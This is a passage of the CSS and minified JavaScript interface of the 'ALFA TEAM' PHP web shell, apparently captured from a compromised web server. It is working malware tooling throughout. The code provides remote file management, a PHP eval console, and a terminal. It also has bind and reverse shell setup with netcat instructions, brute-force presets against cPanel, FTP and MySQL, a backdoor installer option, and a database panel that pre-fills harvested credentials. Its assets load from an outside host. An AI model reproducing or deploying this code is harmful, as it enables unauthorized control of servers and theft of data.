#59cc33;}.txtfont,.tbltxt{color: #FFFFFF;}.alfa_plus{color: #06ff0f;font-weight: unset;}#hidden_sh a{color: #00FF00;}.hidden_shell_version{color: #ff0000;}.shell_name{color: #FF0000;}.main tr:hover{background-color: #646464;}.main th{color: #FFFFFF;}.main .main_name{color: #FFFFFF;font-weight: unset;}.main_size{color: #67ABDF;}.main_modify{color: #67ABDF;}.main_owner_group{color: #67ABDF;}.main_green_perm{color: #25ff00;}.main_red_perm{color: #FF0000;}.main_white_perm{color: #FFFFFF;}.beetween_perms{color: #FFFFFF;}.main .actions{color: #FFFFFF;}.minimized-wrapper{background-color: #0e304a;}.minimized-text{color: #f5deb3;}.editor-explorer,.editor-modal{border: 2px solid #0e304a;}.editor-explorer,.editor-modal{background-color: rgba(0, 1, 23, 0.94);}.editor-header{background-color: rgba(21, 66, 88, 0.93);}.editor-path{color: #00ff7f;}.close-button, .editor-minimize{background-color: #1d5673;}.editor_actions{color: #FFFFFF;}.editor_file_info_vars{color: #FFFFFF;}.filestools{color: #67ABDF;}.hheader-text,.history-clear{color: #14ff07;}.editor-file-name{color: #03b3a3;}.is_active{background-color: rgba(49, 55, 93, 0.77);}.file-holder > .history:hover{background-color: #646464;}input[type=text],textarea{border: 1px solid #0E304A}input[type=text],textarea{color: #999999;}input[type=text]:hover,textarea:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}select{border: 1px solid #0E304A}select{color: #FFFFEE;}select:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}input[type=submit],.button,#addup{border: 1px solid #27979B;}input[type=submit]:hover{box-shadow:0 0 4px #27979B;border:2px solid #27979B;}.button:hover,#addup:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}.ml1{color: #67ABDF;}.ml1{border: 1px solid #0E304A;}.inputfile{box-shadow:0 0 4px #0E304A;border:1px solid #0E304A;}.inputfile strong{background-color: #0E304A;}.inputfile strong{color: #FFFFFF;}.inputfile span{color: #25ff00;}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;}.up_bar{background-color: #00ff00;}.mysql_tables{color: #00FF00;}.mysql_table_count{color: #67ABDF;}.copyright{color: #dfff00;}*::-webkit-scrollbar-thumb{background-color: #1e82b5;}*::-webkit-scrollbar-track{background-color: #000115;}
</style><script type="text/javascript">
var c_ = '/var/www/html/';
var a_ = 'FilesMan2';
var charset_ = 'Windows-1251';
var islinux = true;
var post_encryption_mode = false;var alfa1_="",alfa2_="",alfa3_="",alfa4_="",alfa5_="",alfa6_="",alfa7_="",alfa8_="",alfa9_="",alfa10_="",d=document,mysql_cache={},editor_files={},editor_error=!0,editor_current_file="",php_temrinal_using_cgi=!1,is_minimized=!1,cgi_is_minimized=!1,options_window_is_minimized=!1,database_window_is_minimized=!1,rightclick_menu_context=null,can_hashchange_work=!0,alfa_can_add_opt=!1,alfa_before_do_action_id="",alfa_ace_editors={editor:null,eval:null},col_dumper_selected_data={},_ALFA_AJAX_={},cgi_lang="",upcount=1,terminal_walk_index=[],alfa_current_fm_id=1,alfa_fm_id=0;function set(e,a,t,i,l,o,r,n,s,c,f,_,u){d.mf.a.value=null!=e?e:a_,d.mf.c.value=null!=a?a:c_,d.mf.alfa1.value=null!=t?t:"",d.mf.alfa2.value=null!=i?i:"",d.mf.alfa3.value=null!=l?l:"",d.mf.alfa4.value=null!=o?o:"",d.mf.alfa5.value=null!=r?r:"",d.mf.alfa6.value=null!=n?n:"",d.mf.alfa7.value=null!=s?s:"",d.mf.alfa8.value=null!=c?c:"",d.mf.alfa9.value=null!=f?f:"",d.mf.alfa10.value=null!=_?_:"",d.mf.charset.value=null!=u?u:charset_}function fc(e){var a=alfa_current_fm_id,t="a="+alfab64("FilesMan")+"&c="+alfab64(e.c.value)+"&alfa1="+alfab64(e.alfa1.value)+"&ajax="+alfab64("true")+"&",i="",l=0;if(d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked&&(l++,i+="f[]="+alfab64(decodeURIComponent(e.value))+"&")}),0==l&&"paste"!=e.alfa1.value)return!1;switch(alfaloader("filesman_holder_"+a,"block"),e.alfa1.value){case"delete":d.querySelectorAll("#filesman_holder_"+a+" .fmanager-row").forEach(function(e){var a=e.querySelector("input[type=checkbox]");a.checked&&".."!=a.value?e.remove():a.checked=!1}),d.querySelector("#filesman_holder_"+a+" .chkbx").checked=!1;break;case"copy":case"move":case"zip":case"unzip":d.querySelectorAll("#filesman_holder_"+a+" input[type=checkbox]:checked").forEach(function(e){e.checked=!1})}_Ajax(d.URL,t+i,function(e){alfaloader("filesman_holder_"+a,"none"),alfaFmngrContextRow()},!1,"filesman_holder_"+a)}function initDir(e){var a="",t="";islinux&&(a="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" path='/' href='#action=fileman&path=/'>/</a>",t="/");var l=e.split("/"),o="",r=islinux?"/":"";for(i in"-1"!=l.indexOf("..")&&(l.splice(l.indexOf("..")-1,1),l.splice(l.indexOf(".."),1)),l)""!=l[i]&&(o+="<a onclick=\"g('FilesMan','"+r+l[i]+"/');\" path='"+r+l[i]+"/' href='#action=fileman&path="+r+l[i]+'/\' class="header_pwd">'+l[i]+"/</a>",r+=l[i]+"/");$("header_cwd").innerHTML=a+o+" ",alfaInitCwdContext(),l=(l=t+l.join("/")).replace("//","/"),d.footer_form.c.value=l,$("footer_cwd").value=l,c_=l}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(e,a,t,i,l){var o=!1;return window.XMLHttpRequest?o=new XMLHttpRequest:window.ActiveXObject&&(o=new ActiveXObject("Microsoft.XMLHTTP")),void 0!==l&&(_ALFA_AJAX_[l]=o),o?(o.onreadystatechange=function(){4==o.readyState&&200==o.status?"function"==typeof t&&(t(o.responseText,l),alfaClearAjax(l)):4==o.readyState&&200!=o.status&&(alfaAjaxError(o.status,l,o.statusText,o.responseText),alfaClearAjax(l))},o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),void o.send(a)):void alert("Error !")}function alfaClearAjax(e){_ALFA_AJAX_.hasOwnProperty(e)&&delete _ALFA_AJAX_[e]}function handleup(e,a){var t="__fnameup";if(0!=a&&(t="__fnameup"+a),e.files.length>1){for(var i="",l=0;l<e.files.length;l++)i+=e.files[0].name+", ";$(t).innerHTML=i}else e.files[0].name&&($(t).innerHTML=e.files[0].name)}function u(e){var a=!1,t=0,i=alfa_current_fm_id,l=new FormData,o="filesman_holder_"+i;l.append("a",alfab64(e.a.value)),l.append("c",alfab64(e.c.value)),l.append("alfa1",alfab64(e.alfa1.value)),l.append("charset",alfab64(e.charset.value)),l.append("ajax",alfab64(e.ajax.value)),e.querySelectorAll("input[type=file]").forEach(function(e){if(0==e.value.length)return!1;if(e.files.length>1)for(var a=0;a<e.files.length;a++)l.append("f[]",e.files[a]);else l.append("f[]",e.files[0]);t++}),$("footerup").value="",$("__fnameup").innerHTML="";for(var r=1;r<=upcount;r++){var n=$("pfooterup_"+r);n&&n.parentNode.removeChild(n),upcount--}if(0==upcount&&upcount++,0==t)return!1;var s="up_bar_"+getRandom();$("up_bar_holder").insertAdjacentHTML("beforeend","<div id='"+s+"' class='up_bar'></div>");e.c.value;if(window.XMLHttpRequest?a=new XMLHttpRequest:window.ActiveXObject&&(a=new ActiveXObject("Microsoft.XMLHTTP")),a){var c=$(s);_ALFA_AJAX_[s]=a,a.upload&&(c.style.display="block",a.upload.onprogress=function(e){var a=e.position||e.loaded,t=e.totalSize||e.total,i=Math.floor(a/t*1e3)/10+"%";c.style.width=i}),a.onload=function(e){200===a.status?c.style.display="none":alfaAjaxError(a.status,"upload_area",a.statusText,a.responseText),alfaClearAjax(s)},a.onreadystatechange=function(){if(4==a.readyState&&200==a.status){if("noperm"!=a.responseText&&"[]"!=a.responseText){var e,t=JSON.parse(a.responseText),l="",r=d.querySelectorAll("#"+o+" #filemanager_table tr").length-3;for(e in t){++r;var n=t[e].name,s=encodeURIComponent(n),c=t[e].size,f=t[e].perm,_=t[e].modify,u=t[e].owner,p=loadType(n,"file");try{d.querySelector("#"+o+" .fmanager-row a[fname='"+n+"']").parentElement.parentElement.parentElement.remove()}catch(e){}l+='<tr class="fmanager-row" id="tr_row_'+r+'"><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'+n+'" class="chkbx" id="checkbox'+r+'"><label for="checkbox'+r+'"></label></div></td><td id="td_row_'+r+'">'+p+'<div style="position:relative;display:inline-block;bottom:12px;"><a row="'+r+'" id="id_'+r+'" class="main_name" onclick="editor(\''+s+"','auto','','','','file');\" href=\"#action=fileman&amp;path="+c_+"&amp;file="+s+'" fname="'+n+'" ftype="file" path="'+c_+'" opt_title="">'+n+'</a></div></td><td><span style="font-weight:unset;" class="main_size">'+c+'</span></td><td><span style="font-weight:unset;" class="main_modify">'+_+'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'+u+'</span></td><td><a id="id_chmode_'+r+'" href="javascript:void(0)" onclick="editor(\''+s+"','chmod','','','','file')\">"+f+'</a></td><td><a id="id_rename_'+r+'" title="Rename" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'rename','','','','file')\">R</a> <a id=\"id_touch_"+r+'" title="Modify Datetime" class="actions" href="javascript:void(0);" onclick="editor(\''+s+"', 'touch','','','','file')\">T</a> <a id=\"id_edit_"+r+'" class="actions" title="Edit" href="javascript:void(0);" onclick="editor(\''+s+"', 'edit','','','','file')\">E</a> <a id=\"id_download_"+r+'" title="Download" class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''+n+"', 'download')\">D</a><a id=\"id_delete_"+r+'" title="Delete" class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '+s+" # ?'); chk ? g('FilesMan',null,'delete', '"+s+"') : '';\"> X </a></td></tr>"}d.querySelector("#"+o+" #filemanager_last_tr").insertAdjacentHTML("beforebegin",l),alfaShowNotification("File(s) uploaded successfully","Uploader"),alfaFmngrContextRow()}else alfaShowNotification("Folder has no permission...","Uploader","error");alfaCheckCurrentFilesManTab(i)}},a.open("POST",d.URL),a.send(l)}}function alfaCheckCurrentFilesManTab(e){-1==$("filesman_tab_"+e).classList.value.indexOf("filesman-tab-active")&&$("filesman_tab_"+e).classList.add("tab-is-done")}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){var fm_id=0==alfa_fm_id?alfa_current_fm_id:alfa_fm_id,fm_id2=alfa_fm_id,fm_path=null==c||0==c.length?c_:c,d_mf_c=fm_path,g_action_id=alfa_before_do_action_id;0==alfa_fm_id&&(set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),d_mf_c=d.mf.c.value),"GetConfig"!=a&&"download"!=alfa2&&islinux&&"/"!=d_mf_c.substr(0,1)&&(d_mf_c="/"+d_mf_c),"FilesMan"==a?(alfaloader("filesman_holder_"+fm_id,"block"),g_action_id="filesman_holder_"+fm_id):""!=g_action_id?alfaloader(g_action_id,"block"):"FilesTools"!=a&&"download"!=alfa2&&"GetConfig"!=a&&("sql"==a?(showEditor("database_window"),g_action_id=loadPopUpDatabase("")):"FilesMan"!=a&&(showEditor("options_window"),g_action_id=loadPopUpOpTions(a)),alfaloader(g_action_id,"block"));for(var data="a="+alfab64(a)+"&c="+alfab64(d_mf_c)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if("FilesMan"==a){var pagenum=d.querySelector("#"+g_action_id+" .page-number.active-page-number");null!=pagenum&&(data+="pagenum="+alfab64(getCookie(g_action_id+"_page_number")),setCookie(g_action_id+"_page_number",1,2012))}if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){alfaLoaderOnTop("none");var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d_mf_c),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data,function(e,t){evalJS(e);var i=!1;if(alfaLoaderOnTop("none"),"sql"==a)return console.log(t),loadPopUpDatabase(e,t),!1;if("FilesMan"==a){alfaloader("filesman_holder_"+fm_id,"none"),d.querySelector("#filesman_holder_"+fm_id).innerHTML=e,fm_path=fm_path.replace(/\/\//g,"/"),$("filesman_tab_"+fm_id).setAttribute("path",fm_path);var l=alfaGetLastFolderName(fm_path);d.querySelector("#filesman_tab_"+fm_id+" span").innerHTML=l,alfaFmngrContextRow(),"function"==typeof alfa1&&alfa1(e),alfaCheckCurrentFilesManTab(fm_id)}else(options_window_is_minimized||"."==t.substr(0,1))&&"."==t.substr(0,1)&&(i=!0,t=t.substr(1),showEditor("options_window")),i||alfaloader(t,"none"),loadPopUpOpTions(t,e),"phpeval"==a&&alfaLoadAceEditor("PhpCode"),"coldumper"==a.substr(0,9)&&alfaColDumperInit()},!1,""==g_action_id?"."+a:g_action_id),g_action_id="",0==fm_id2&&c!=c_&&c&&initDir(c)):(alfaloader(alfa3,"block"),_Ajax(d.URL,data,function(e,a){var t=a;a=d.querySelector("#"+("id_db"!=a.substr(0,5)?"option_"+a:a));try{(e=JSON.parse(e)).host&&e.user&&e.dbname&&($("db_host")&&(a.querySelector("#db_host").value=e.host),$("db_user")&&(a.querySelector("#db_user").value=e.user),$("db_name")&&(a.querySelector("#db_name").value=e.dbname),$("db_pw")&&(a.querySelector("#db_pw").value=e.password),$("db_prefix")&&e.prefix&&(a.querySelector("#db_prefix").value=e.prefix),$("cc_encryption_hash")&&e.cc_encryption_hash&&(a.querySelector("#cc_encryption_hash").value=e.cc_encryption_hash))}catch(e){}alfaloader(t,"none")},!1,alfa3))}function alfaGetLastFolderName(e){var a=e.replace(/\/\//g,"/").split("/");for(var t in a)0==a[t].length&&a.splice(t,1);var i=a[a.length-1];return 0==i.length&&(i="/"),i}function alfaloader(e,a){if(0==e.length)return!1;try{var t=$("loader_"+e);if(null==t&&"block"==a){var i=null;"editor"==e?i=d.querySelector("#editor .editor-modal"):"id_db"==e.substr(0,5)?i=$(e):"terminal_id"==e.substr(0,11)?i=$(e):"editor"==e.substr(0,6)?i=$(e):"cgiframe"==e?i=$("cgiframe"):"filesman_holder"==e.substr(0,15)?(i=$(e)).style.minHeight="300px":i=$("option_"+e),i.insertAdjacentHTML("afterbegin","<div id='loader_"+e+'\' class="options-loader-holder"><div parent="'+e+'" onclick="alfaAjaxController(this);" class="stopAjax">[ Stop it ]</div><div class="alfateam-loader-text">ALFA TEAM</div><div class="alfa-ajax-error"></div><img src=\'http://solevisible.com/images/loader.svg\'></div>')}else"filesman_holder"==e.substr(0,15)&&($(e).style.minHeight="0"),null!=t&&(t.style.display=a)}catch(e){}}function fs(e){var a=e.getAttribute("db_id"),t=d.querySelector("#"+a+" div.sf");mysql_cache.hasOwnProperty(a)||(mysql_cache[a]={}),alfaloader(a,"block");var i=t.querySelector("input[name=sql_host]").value,l=t.querySelector("input[name=sql_login]").value,o=t.querySelector("input[name=sql_pass]").value,r=t.querySelector("input[name=sql_base]")?t.querySelector("input[name=sql_base]").value:t.querySelector("select[name=sql_base]").value,n=t.querySelector("select[name=type]").value,s=t.querySelector("input[name=sql_count]").checked?"true":"";_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("query")+"&alfa2=&c="+alfab64(c_)+"&charset="+alfab64("UTF-8")+"&type="+alfab64(n)+"&sql_host="+alfab64(i)+"&sql_login="+alfab64(l)+"&sql_pass="+alfab64(o)+"&sql_base="+alfab64(r)+"&sql_count="+alfab64(s)+"&current_mysql_id="+alfab64(a)+"&ajax="+alfab64("true"),function(e,a){loadPopUpDatabase(e,a),evalJS(e),alfaloader(a,"none")},!1,a)}function ctlbc(e){var a=$("bcStatus"),t=$("bcipAction");"bind"==e.value?(t.style.display="none",a.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in u=atob(u),editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div 